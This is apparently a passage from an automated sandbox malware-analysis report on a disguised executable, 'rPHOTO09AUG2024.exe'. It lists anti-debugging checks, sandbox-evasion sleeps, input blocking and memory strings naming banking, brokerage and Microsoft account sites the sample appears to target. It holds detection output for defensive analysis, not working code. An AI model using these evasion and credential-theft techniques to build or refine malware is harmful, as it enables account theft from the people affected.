Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02376CB3 push ebx; iretd	4_2_02376E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0237101F push es; iretd	4_2_02371027

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00D44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00D44A35
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DC55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00DC55FD

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D633C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00D633C7

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	API/Special instruction interceptor: Address: 1083204
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9843

Jump to behavior

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-99975

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4488	Thread sleep count: 129 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4488	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4488	Thread sleep count: 9843 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4488	Thread sleep time: -19686000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe TID: 3744	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe TID: 3744	Thread sleep time: -39000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe TID: 3744	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe TID: 3744	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00DA4696
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00DAC9C7
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAC93C FindFirstFileW,FindClose,	0_2_00DAC93C
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DAF200
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DAF35D
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DAF65E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DA3A2B
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DA3D4E
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_00DABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DABF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0237BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0237BAB0

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D44AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D44AFE

Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000A.00000002.2609378535.0000024DE303B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: eODCXMCnMwxOuMbj.exe, 00000008.00000002.4640747379.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: netbtugc.exe, 00000004.00000002.4634931350.000000000277E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	API call chain: ExitProcess graph end node			graph_0-98410
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	API call chain: ExitProcess graph end node			graph_0-98482

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0377096E rdtsc

2_2_0377096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417823 LdrLoadDll,

2_2_00417823

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DB41FD BlockInput,

0_2_00DB41FD

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D43B4C

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00D75CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00D75CCC

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe

Code function: 0_2_00DBC304 LoadLibraryA,GetProcAddress,

0_2_00DBC304

Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_01083470 mov eax, dword ptr fs:[00000030h]	0_2_01083470
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_010834D0 mov eax, dword ptr fs:[00000030h]	0_2_010834D0
Source: C:\Users\user\Desktop\rPHOTO09AUG2024.exe	Code function: 0_2_01081E70 mov eax, dword ptr fs:[00000030h]	0_2_01081E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]	2_2_037D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]	2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]	2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]	2_2_037D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]	2_2_037B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]	2_2_0372C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]	2_2_03750310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]	2_2_0376A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]	2_2_037663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]	2_2_037403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]	2_2_037DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]	2_2_037D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]	2_2_037EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0373A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]	2_2_037383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]	2_2_037B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]	2_2_03728397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]	2_2_0372E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]	2_2_0375438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]	2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]	2_2_03734260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]	2_2_0372826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]	2_2_0372A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]	2_2_03736259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]	2_2_037B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]	2_2_0372823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]	2_2_037402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0373A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]	2_2_037C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]	2_2_0376E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]	2_2_037B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]	2_2_0372C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]	2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]	2_2_03736154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
